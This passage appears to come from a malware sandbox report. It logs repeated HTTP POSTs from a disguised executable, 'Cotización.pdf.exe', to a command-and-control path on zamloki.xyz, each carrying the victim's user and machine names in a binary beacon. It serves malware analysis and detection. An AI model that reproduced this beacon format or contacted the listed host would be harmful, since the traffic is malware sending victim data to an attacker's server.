                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xCr5X5UOsBNO65PibfBIPfZsKc95LFb8DDipkMSr5JiFKjl1XGeKymJKlBizO4E1jTGKObHhbXJeT02rPJKNjh49CAjzR8e57NPtssxYIVUlMNg9QIpRbj9LxoHJFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fb2f9d14e25-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    86192.168.2.349823104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:37.872284889 CEST5623OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:37.890208960 CEST5623OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:38.142652988 CEST5624INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K1JzpOVwqox%2BK%2Fqo%2ByT835ZUhEKRpxPGeojVV%2BwIWitgSQH8QktwekLuBfPnsRgYnHQsenc3yRXpyRV8xnsuxXheYW8vXbzISDNX%2F%2BaWAzqYUZbH7bM56w8ZCY5EiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fb6cbd42c26-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    87192.168.2.349824172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:38.354510069 CEST5624OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:38.372723103 CEST5625OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:38.643256903 CEST5625INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vkgAd2VazehXurfO6RotEfeXhCsP02dcKvTXZ%2BPaYtX5PqFq6TtnpVjJAGVk8BH2nGpatyh0e7AjQqCaIgXvbPh18%2BgYtqZqFsLpe8l%2BFzKWsE7CXRpE8r0IKIDz0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fb9c8522c22-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    88192.168.2.349825104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:38.846386909 CEST5626OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:38.869661093 CEST5627OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:39.252804041 CEST5627INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zl1xvzyFzsPekiWqiS5L0OnywpQecfVnHU0%2FantniH5Fp%2B7709zIBqqy%2BmQL0s56ONf%2FfVUD2B%2FZhjDf88sqe86PsxRj0WdEc6BSdvZltNmkudEpd6MPNkIQW1J6gA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fbcee831f55-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    89192.168.2.349826104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:39.462964058 CEST5628OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:39.500183105 CEST5628OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:39.762248039 CEST5629INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BozkAPYTjpL3DaQeN%2B79wX1m9F08zX%2FGTvbp6mF56Zs5iwwRsNOdZEnPQ9u%2F8oPu23e%2FqYB3uHdzU9wIsWEa2JL8JQrlM8b5Svwb9RF7DtYpIPJWwKsdNQWDObvzjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fc0cbf805f9-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    9192.168.2.349737172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:52.982084036 CEST1294OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:52.999691963 CEST1294OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:53.262790918 CEST1295INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T0Sh%2F9SdtCoAOrhmhKPGoxLDsizpj78%2FjofBS2BGCk0EnxPTNwpxtjRCFXcEtw416mXXn3oyeImeqDyhrNcFgWzNTHJqwW18Ph5YDBQC%2FlZmlCYCGKwCU%2BYuqhujFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e9e3aa8c2fe-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    90192.168.2.349827104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:39.966711998 CEST5630OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:39.987859964 CEST5630OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:40.240339994 CEST5631INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oAbWSHzTthk%2B4Si4NS%2Fm14cv6q0ECuOSAh0IaUv15q2IQvFvQ8VoRZAnoynui69pddyfZT9yQvAGsJqO82r33MDPKPvipgxj4Vi87Y9e%2BVvdev2VJ1IpusJz1qy9aQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fc3ec474a56-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    91192.168.2.349828104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:40.433906078 CEST5632OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:40.451919079 CEST5633OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:40.738461971 CEST5633INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SBzZRs5%2BSLufkrXZlKDmc3amlFsQnGPpwQELRkOHD6%2FXUSKUkFlLwPQK9He%2FBi4gWDV8XXOBn19M6t%2FUZ%2BUmyXMwHmRYqqdcGD7tLQnKj2HTrCZFGa1vVpY2XZsBcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fc6ca2ce003-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    92192.168.2.349829104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:40.967166901 CEST5634OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:40.987943888 CEST5635OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:41.346208096 CEST5640INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F8NJg5dwAC82yBUOeDHJxDrt64tTL9awz4XM7ZK%2Bjz4U0BFaAipYj1VBOgh2RnmA4meMDix3oXd5uIGk%2F4ieARlvuTxNEx6Vg0OtUdqcDUV54fFalC5CKvtF6farYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fca1b6f1456-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    93192.168.2.349831172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:41.554207087 CEST5642OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:41.576540947 CEST5644OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:41.827415943 CEST5646INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wPYc%2BaTIrYu3XhL5rVEYzvS6oJTwHF%2BexV4ZG8ecaONuDtEuhnFv%2BCK%2FG31nEEPrBFvEmzBCjqtK3wJTLZoB2W05C3vcBHX86Fz4KqOuHyw7mZBHmylGsEOmmDocNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fcdcd494e80-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    94192.168.2.349832104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:42.040060997 CEST5646OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:42.057975054 CEST5647OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:42.313322067 CEST5647INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZHE27GXzO6KgF9I0Rm%2BLgGODJFH1cL3nw9hN64xUSw7y6vclM9GAhrWFW%2B3Pnyn9SZX9Aardjj4a1YD%2BK%2Bh8q4u9NgaxcupD3nq6gFxZVbLSdLM%2Fn9r2sEnW%2FlUeig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fd0dc3a4dd0-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    95192.168.2.349833104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:42.533368111 CEST5648OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:42.553056002 CEST5649OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:42.813016891 CEST5649INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kx3o6orfMpWVV5D7bEV3xlPS0y%2BD43OKiD7A%2BYg2fwhmMEljS4fLyanqvZGGtPdZae3yCmpJNfe7v9UeCFqP%2BgE3ei%2FpKEOoVbJXr60d4ihpHCJ3XZ0RVn5VJaLb4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fd3eaeabf0f-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    96192.168.2.349834172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:43.028630972 CEST5650OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:43.048029900 CEST5651OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:43.310630083 CEST5651INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PSe3nVtOBiLABt59S1PPFesqg4lnowlNqAovdAr%2BXZzQoOHcWXyYuzlNY6CP3qSlJoJT%2B8kCqJYlGESs0QGoCopIpxylthBKV9Z9F%2BYwrU0%2Fy%2FMU7Mf5nvCKpbiuvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fd70f14073e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    97192.168.2.349836172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:43.538465023 CEST5655OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:43.556344032 CEST5656OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:43.846981049 CEST5662INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E13SV5HQkRvPUV3lLZo%2F8EkcVMF%2BAodFNSdYZOikwQARgwdPQ4dk5VOtmHQdqrQoNNYIAX%2BMzt5MAJ8%2BCKgiecemX00BBYP%2FP7b27%2FgZAgqUK%2B8gP8dE8bRkm%2FzX3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fda2f682c52-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    98192.168.2.349837104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:44.281989098 CEST5663OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
